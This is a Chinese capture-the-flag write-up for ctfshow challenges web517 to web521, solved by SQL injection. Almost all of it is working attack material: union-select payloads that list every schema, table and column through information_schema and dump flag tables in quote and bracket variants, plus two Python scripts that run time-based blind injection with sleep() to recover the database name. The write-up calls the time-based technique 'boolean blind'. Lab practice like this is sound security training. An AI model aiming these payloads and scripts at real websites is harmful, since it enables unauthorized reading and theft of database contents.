提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档

---

题目

---

一、web517

?id=1  显示正常
?id=1'  报错
?id=1' --+  显示正常
1
2
3

基于错误的GET单引号字符型注入

?id=1' order by 3 --+

?id=0' union select 1,2,3 --+

?id=0' union select 1,2,database() --+  //当前库
?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata --+   //所有库

?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' --+

?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag' --+

?id=0' union select 1,2,group_concat(flag) from ctfshow.flag --+
1
2
3
4
5
6
7
8
9
10
11
12

二、web518

?id=1  显示正常
?id=1'  报错
?id=1' --+  报错
?id=1 --+  显示正常
1
2
3
4

基于错误的GET整型注入

?id=1 order by 3 --+

?id=0 union select 1,2,3 --+

?id=0 union select 1,2,database() --+
?id=0 union select 1,2,group_concat(schema_name) from information_schema.schemata --+

?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' --+

?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flagaa' --+

?id=0 union select 1,2,group_concat(flagac) from ctfshow.flagaa--+
1
2
3
4
5
6
7
8
9
10
11
12

三、web519

?id=1  显示正常
?id=1'  报错
?id=1' --+  报错
?id=1') --+  显示正常
1
2
3
4

基于错误的GET单引号变形字符型注入

?id=1') order by 3 --+

?id=0') union select 1,2,3 --+

?id=0') union select 1,2,database() --+  //当前库
?id=0') union select 1,2,group_concat(schema_name) from information_schema.schemata --+   //所有库

?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' --+

?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flagaanec' --+

?id=0') union select 1,2,group_concat(flagaca) from ctfshow.flagaanec--+
1
2
3
4
5
6
7
8
9
10
11
12

四、web520

基于错误的GET双引号字符型注入

?id=1") order by 3 --+

?id=0") union select 1,2,3 --+

?id=0") union select 1,2,database() --+  //当前库
?id=0") union select 1,2,group_concat(schema_name) from information_schema.schemata --+   //所有库

?id=0") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' --+

?id=0") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flagsf' --+

?id=0") union select 1,2,group_concat(flag23) from ctfshow.flagsf--+
1
2
3
4
5
6
7
8
9
10
11
12

五、web521

双注入GET单引号字符型注入
测试时，发现正常情况下只会显示You are in…

布尔盲注

?id=1' and sleep(5) --+
1

脚本：

1.获取数据库名长度

# coding:utf-8
import requests
import datetime
import time
def database_len():
    for i in range(1, 10):
        url = "http://22c5ef77-f9ec-4af9-98a5-d09243d65708.challenge.ctf.show/?id=1"
        payload = " ?id=1' and if(length(database())>%s,sleep(1),0) --+" % i
        # print(url+payload+'%23')
        time1 = datetime.datetime.now()
        r = requests.get(url + payload)
        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec >= 1:
            print(i)
        else:
            print(i)
            break
    print('database_len:', i)

if __name__ == '__main__':
    database_len()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

2.获取当前数据库名

# coding:utf-8
import requests
import datetime
import time

def database_name():
    name = ''
    for j in range(1,9):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':
            url = "http://22c5ef77-f9ec-4af9-98a5-d09243d65708.challenge.ctf.show/?id=1"
            payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (j,i)
            #print(url+payload)
            time1 = datetime.datetime.now()
            r = requests.get(url + payload)
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >=3:
                name += i
                print(name)
                break
    print('database_name:', name)

if __name__ == '__main__':
    database_name()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24